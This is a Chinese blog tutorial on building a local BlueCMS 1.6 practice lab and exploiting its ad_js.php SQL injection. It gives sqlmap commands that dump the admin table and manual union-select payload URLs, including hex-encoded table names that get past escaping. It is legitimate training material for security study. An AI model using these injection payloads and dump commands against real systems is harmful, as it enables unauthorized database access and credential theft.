搭建bluecms_src - 蓝奏云 靶场详细教程

已于 2024-09-13 15:54:26 修改
阅读量852 收藏 19
点赞数 8
分类专栏: 靶场搭建 文章标签: 网络安全
于 2024-09-13 15:30:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74077634/article/details/142211898
版权

1, 本地搭建靶场
搭建CMS:blueCMS1.6

环境:PHP+Mysql

使用工具:phpstudy

准备工作:安装Python软件

步骤一:https://github.com/source-trace/bluecms

步骤二:将下载好的CMS文件解压到phpstudy目录下的WWW目录里面(注意文件路径:本地搭建靶场WWW文件夹位于PHPTutorial文件夹里面,如下图src文件夹即为CMS文件解压后的文件)。

步骤三:本机开启phpstudy    下载链接:phpStudySetup.rar官方版下载丨最新版下载丨绿色版下载丨APP下载-123云盘

注意: 1,使用php5.2.17版本+apache,版本切换请点击下图标识点1选择

2,确认选择非服务模式,见下图标识点2

3,点其他选项菜单,见下图标识点3,新的弹出菜单里选择"phpStudy设置"—

—“端口常规设置”, 设置端口为80。

步骤四:本地打开Google Chrome浏览器,访问http://localhost/src/uploads/install/ 安装CMS.**

出现以上页面就代表我们可以安装CMS了,勾选复选框,点击“继续”

再点击“继续”

数据库名称:可随便写(建议写bluecms),数据库用户名:root ,数据库密码:root 。管理员姓名、登录密码可以自行设置。

输入完成后点击“下一步”, 等待十多秒后即安装成功。此时访问http://localhost/src/uploads/

返回上面页面即显示我们的bluecms已成功安装,以及靶场搭建完成。此时我们访问后台地址

http://localhost/src/uploads/admin/login.php?act=login

上述页面再次确认我们的靶场已成功搭建。

步骤五:访问我们的靶场(收集数据)

1,我们先网页访问存在漏洞的点

http://localhost/src/uploads/ad_js.php?ad_id=1

无数据返回,我们再用sql注入的方式再执行访问

http://localhost/src/uploads/ad_js.php?ad_id=1%27

2,发现疑似存在sql注入,使用sqlmap来进行进一步探查。

先下载sqlmap.zip文件并解压,下载地址:sqlmap.zip官方版下载丨最新版下载丨绿色版下载丨APP下载-123云盘

打开我们已经解压好的sqlmap文件夹(此时可以看到sqlmap.py文件,见下图),地址栏输入cmd,回车,打开命令提示符窗口。

输入:python sqlmap.py -u http://localhost/src/uploads/ad_js.php?ad_id=1 回车(见下图)

备注:由于上述地址不是登录之后才能访问的地址,所以可以直接使用-u

遇到询问输入Y回车,等运行结束。

发现存在注入,接下来使用命令查看数据库:

python sqlmap.py -u http://localhost/src/uploads/ad_js.php?ad_id=1 -batch -dbs

接下来查看数据库“bluecms"里的数据表:

python sqlmap.py -u http://localhost/src/uploads/ad_js.php?ad_id=1 -batch -dbs -D "bluecms" -tables

接下来查询blue_admin数据命令:

python sqlmap.py -u http://localhost/src/uploads/ad_js.php?ad_id=1 -batch -dbs -D "bluecms" -T "blue_admin" --dump

发现账号密码为: yanghao/123456,输入之后成功登录

步骤六:在初期渗透测试的过程中,为了熟练操作数据库语句,我们还可以尝试使用手工注入查字段

打开浏览器,输入:http://localhost/src/uploads/ad_js.php?ad_id=1%20order%20by%201

无数据返回,我们重新输入:http://localhost/src/uploads/ad_js.php?ad_id=1%20order%20by%2010

http://localhost/src/uploads/ad_js.php?ad_id=1%20order%20by%207

http://localhost/src/uploads/ad_js.php?ad_id=1%20order%20by%208

返回页面分别如下:

发现存在7个字段,order by 是查询字段数,因为页面没有回显点,接下来我们通过查看源代码来查找回显点:

view-source:http://localhost/src/uploads/ad_js.php?ad_id=1%20union%20select%201,2,3,4,5,6,7

发现7为回显点,查询数据表名命令:

view-source:http://localhost/src/uploads/ad_js.php?ad_id=1%20union%20select%201,2,3,4,5,6,table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1

发现数据表名第一个为blue_id,查询第二个表名,再结尾修改limit 0,1 为 limit 1,1

view-source:http://localhost/src/uploads/ad_js.php?ad_id=1%20union%20select%201,2,3,4,5,6,table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%201,1

接下来查字段

view-source:http://localhost/src/uploads/ad_js.php?ad_id=1%20union%20select%201,2,3,4,5,6,column_name%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=0x626c75655f61646d696e%20limit%200,1

(知识点:在如果存在转义情况下,可以使用16进制来进行注入)如下所示:

view-source:http://localhost/src/uploads/ad_js.php?ad_id=1%20union%20select%201,2,3,4,5,6,column_name from information_schema.columns where table_schema=database() and table_name=0x626c75655f61646d696e limit 0,1

2,虚拟机搭建靶场
步骤1:准备工作

在虚拟机软件中创建两个虚拟机环境并同时启动:一个是Kali Linux,另一个是Windows 2003。

步骤2:安装和配置环境

在虚拟机Windows 2003中安装phpstudy。

下载blueCMS1.6文件,并解压得到一个名为"src"的文件夹。

将解压后的"src"文件夹拖入到虚拟机Windows 2003的phpstudy/WWW文件夹中。

在虚拟机Windows 2003里启动phpstudy,并设置端口号为90,其他设置参照前面本地搭建靶场phpstudy设置。

在虚拟机Windows 2003中打开运行窗口(Windows+R),输入"cmd"打开命令提示符。

在管理员命令提示符界面中,输入"ipconfig"获取虚拟机Windows 2003的IP地址。

步骤3:安装CMS

在虚拟机Kali Linux中打开浏览器。

输入"http://ip:端口/src/uploads/install/"访问CMS安装页面。 (注意:将IP替换为在前面步骤中通过ipconfig命令获取到的虚拟机Windows 2003的IP地址,端口设置为90)

(比如我电脑上虚拟系统Windows2003的IP是192.168.154.131,端口90;我在kali-linux虚拟系统里面的访问地址就是http://192.168.154.131:90/src/uploads/install/)

步骤4:访问靶场

完成CMS安装后,导入sqlmap文件夹至虚拟机Kali Linux中root文件夹内(可在本机系统用Xftp软件实现),此时sqlmap.py文件路径为root/sqlmap/,访问靶场。Xftp软件下载链接:Xftp-7.0.0150p.exe官方版下载丨最新版下载丨绿色版下载丨APP下载-123云盘

打开虚拟机Kali Linux,登录root账户,进入Terminal终端, 输入命令 cd sqlmap 回车,返回以下界面

此时就可以像本地运行命令提示符窗口输入命令并正常执行,输入命令:

python sqlmap.py -u http://192.168.154.131:90/src/uploads/ad_js.php?ad_id=1

(192.168.154.131:90是我虚拟机Windows2003的IP:端口,此处你应该替换成你自己查到的IP:端口)

后续执行步骤与前面本地搭建靶场步骤相同的操作,只需将本地搭建靶场访问地址中的"localhost"替换为查询到的IP地址和端口。

不会代码的小徐
关注
专栏目录
搭建靶场
qq_39909907的博客
08-02 2636
在终端输入:ifconfig查看ip地址,接着输入netdiscover -r xxx.xxx.xxx.1/24 可能出现在vmware上的kali搜索不到virbox上的靶机,这是因为二者不在同一网段,可以在virbox里【设置】【网络】修改【连接方式】为【桥接网卡】,选择合适的网卡,再在vmware【编辑】【虚拟网络编辑器】里选择桥接模式 然后进行当前机器和靶场机器的连通性测试:接着输...
零基础教你搭建一个自己的靶场
南迪叶先森
07-05 5236
公粽号:黒掌 一个专注于分享网络安全、黑客圈热点、黑客工具技术区博主! 0x00 前言 第一次尝试挖SRC的小伙伴可能会觉得挖掘漏洞非常困难,没有思路,不知道从何下手,在这里我分享一下我的思路 0x01 挖掘思路 确定自己要挖的漏洞,以及该漏洞可能存在的功能点,然后针对性的进行信息收集 例如我要挖弱口令,或者验证码绕过等漏洞,那么常见的功能点肯定是登录页面,那么就可以通过google语法来收集存在登录功能的页面 intitle: 后台管理 intitle: 登录 再比如说我要挖SQL注入,那
搭建bluecms靶场
FuYuDong2的博客
08-01 409
详细在本地用phpstudy搭建bluecms靶场
0基础教你搭建靶场(本地、虚拟机)
2301_76332302的博客
04-18 2579
完成CMS安装后,导入sqlmap文件夹至虚拟机Kali Linux中root文件夹内(可在本机系统用Xftp软件实现),此时sqlmap.py文件路径为root/sqlmap/,访问靶场。数据库名称:可随便写(建议写bluecms),数据库用户名:root ,数据库密码:root。在虚拟机Windows 2003里启动phpstudy,并设置端口号为90,其他设置参照前面本地搭建靶场phpstudy设置。3,点其他选项菜单,见下图标识点3,新的弹出菜单里选择"phpStudy设置"—
Web安全和渗透测试有什么关系?
Python_0011的博客
03-31 1289
做渗透测试的一个环节就是测试web安全,需要明白漏洞产生原理,通过信息收集互联网暴露面,进行漏洞扫描,漏洞利用,必要时进行脚本自编写和手工测试,力求挖出目标存在的漏洞并提出整改建议,当然如果技术再精一些,还要学习内网渗透(工作组和域环境),白盒审计,app,小程序渗透那些了......可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。总之,web安全包含于渗透测试,但不是渗透测试的全部。
WEB安全渗透测试-pikachu&DVWA&sqli-labs&upload-labs&xss-labs靶场搭建(超详细
m0_69583059的博客
01-23 2982
对于web安全刚入门的小伙伴来说,漏洞靶场搭建是很重要的,可以通过靶场学以致用,对所学知识点进行巩固练习。下面和我一起搭建5个比较常用的初学者入门靶场,演示搭建环境:win11系统+phpstudy。
bluecms-src靶场安装包
最新发布
09-10
bluecms-src靶场安装包
bluecms_v1.6_sp1.zip
01-25
"bluecms_v1.6_sp1.zip" 是一个软件压缩包,主要包含了一个名为 "bluecms_v1.6_sp1" 的更新版本。这个版本可能是针对 "BlueCMS" 系统的一个更新,版本号为 1.6 Service Pack 1(SP1),通常SP代表着一个重要的补丁或...
bluecms-zzcms.rar
06-09
"bluecms-zzcms.rar"这个压缩包包含两个流行的开源内容管理系统(CMS)——BlueCMS v1.6 sp1和ZZCMS 8.2的源代码,这两个系统被广泛用于搭建网站,同时也被用作初学者进行代码审计的实例。 **BlueCMS v1.6 sp1** ...
bluecms_v1.6_sp1审计
Amdy_amdy的博客
09-26 1076
针对用户的输入输出   数据流进行追踪审计 知识点: inval()只获取变量的整数值。          -针对数据进行过滤的方式,是有效的。 addslashes将特殊符号添加\进行防御      int型注入可以突破这种过滤   疑问: do_edit_pwd   处,验证是否有问题 user_name 开始安装页面: 1、http://localhost/blue...
[其他类别]mysql数据库管理工具(bluecms)_mysql.zip
03-13
BlueCMS是基于MySQL的一款数据库管理工具,旨在简化数据库的管理和操作,提高开发人员的工作效率。 1. **MySQL核心概念** - **关系型数据库**:MySQL遵循ACID(原子性、一致性、隔离性和持久性)原则,支持SQL标准...
红队靶场搭建
weixin_51846555的博客
01-01 450
红队靶场环境的搭建
使用虚拟机搭建pikachu靶场
zxcvbnm123456x的博客
06-02 3582
1.我们的kali需要在VMware中搭建,基于linux的操作系统2.现在打开虚拟机3.此时的账号和密码都是“kali”,之后进行登录这时我们就来到了kali的主页面,此时第一步也完成了。
0x02 - 虚拟靶场环境搭建
wkh_0506的博客
01-28 827
0x02 - 虚拟靶场环境搭建
靶场搭建——搭建pikachu靶场
钟言的博客
07-02 7290
本篇为pikachu靶场搭建,使用虚拟机搭建pikachu靶场,使用win2012搭建靶场,这里包含了搭建一个pikachu靶场的具体步骤以及在主机上以及虚拟机不同场景的搭建过程,以及不同常见搭建过程中所碰见的问题,这里有Warning: mysqli_connect(): (HY000/1049): Unknown database 'pikachu' in D:\phpstudy_pro\WWW\pikachu\index.php on line 14解决,以及如何连接虚拟机win2012。
搭建靶场sqli-labs(详细附图)
weixin_44023403的博客
04-06 2671
搭建靶场sqli-labs一、搭建靶场二、遇到问题及解决办法; 一、搭建靶场 搭建sqli-labs靶场,首先需要搭建PHP环境,这里先下载一个PHPstudy,选择适应自己的版本,下载链接:https://www.xp.cn/ phpStudy装好之后,将SQLi-Labs解压,放到phpStudy安装目录下的/phpstudy_pro/WWW 修改/sqli-labs/sql-connections/credb.inc文件中mysql账号密码,使之能连接上数据库 查看phpstudy网站配置根目
pikachu,DVWA靶场本地搭建
dreamthe的博客
10-13 1309
首先需要下载各个靶场的代码,因为pikachu、dvwa、sqli_labs所需的环境配置都差不多,我们只需要会搭建其中一个就可以了。接下来我以pickachu 为案列将步骤给大家演示一下。 第一步:代码的下载 我自己使用的window10 64位的。自己去查看一下自己电脑的版本信息。 首先下载phpstudy,官网地址:https://www.xp.cn 选择windows版 选择立即下载选择对应版本。下载下来按照步骤安装就可以了。 安装完成 打开phpstudy,进入如下页面将mysq..
攻防演练靶场环境搭建
Lemlly_Cicter的博客
07-02 1470
大多数公司内网环境都有这些东西,完全模拟真实的企业网络环境,当然,因为服务器配置的关系,肯定不会完全包含。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值